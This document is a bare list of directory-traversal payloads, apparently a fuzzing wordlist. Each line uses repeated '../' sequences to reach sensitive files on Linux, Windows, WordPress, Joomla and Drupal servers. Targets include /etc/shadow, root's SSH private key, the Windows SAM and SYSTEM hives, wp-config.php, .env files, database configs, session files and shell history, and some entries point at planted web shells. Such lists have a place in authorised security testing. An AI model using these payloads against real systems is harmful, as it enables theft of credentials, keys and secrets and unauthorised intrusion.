../../etc/passwd
../../../wp-config.php
../../../../windows/win.ini
../../../../../../etc/passwd
../../../../../../etc/shadow
../../../../../../etc/hosts
../../../../../../etc/hostname
../../../../../../etc/mysql/my.cnf
../../../../../../proc/self/environ
../../../../../../var/log/auth.log
../../../../../../var/mail/root
../../../../../../var/log/dmesg
../../../../../../root/.ssh/id_rsa
../../../../../../windows/win.ini
../../../../../../windows/system32/drivers/etc/hosts
../../../../../../windows/system32/config/sam
../../../../../../windows/system32/config/system
../../../../../../windows/system32/config/software
../../../../../../windows/system32/config/security
../../../../../../windows/system32/license.rtf
../../../../../../windows/repair/sam
../../../../../../inetpub/wwwroot/web.config
../../../../../../windows/system32/drivers/etc/services
../../../../../../wp-config.php
../../../../../../wp-content/debug.log
../../../../../../wp-content/uploads/.htaccess
../../../../../../wp-includes/rss-functions.php
../../../../../../wp-admin/.htpasswd
../../../../../../wp-content/uploads/wp-backup.sql
../../../../../../configuration.php
../../../../../../administrator/logs/error.php
../../../../../../tmp/shell.php
../../../../../../cache/sessions/sess_abc123
../../../../../../libraries/joomla/database/table/user.php
../../../../../../logs/joomla.php
../../../../../../sites/default/settings.php
../../../../../../sites/default/files/.htaccess
../../../../../../sites/default/files/tmp/shell.php
../../../../../../core/modules/user/user.module
../../../../../../core/modules/system/system.module
../../../../../../var/www/html/phpMyAdmin/config.inc.php
../../../../../../etc/mysql/my.cnf
../../../../../../etc/postgresql/9.5/main/pg_hba.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../opt/lampp/phpmyadmin/config.inc.php
../../../../../../var/log/apache2/access.log
../../../../../../var/log/apache2/error.log
../../../../../../var/log/nginx/access.log
../../../../../../var/log/syslog
../../../../../../var/log/auth.log
../../../../../../proc/self/environ
../../../../../../var/lib/php/sessions/sess_abc123
../../../../../../var/www/html/.env
../../../../../../var/tmp/.session
../../../../../../home/user/.bash_history
../../../../../../home/user/.ssh/known_hosts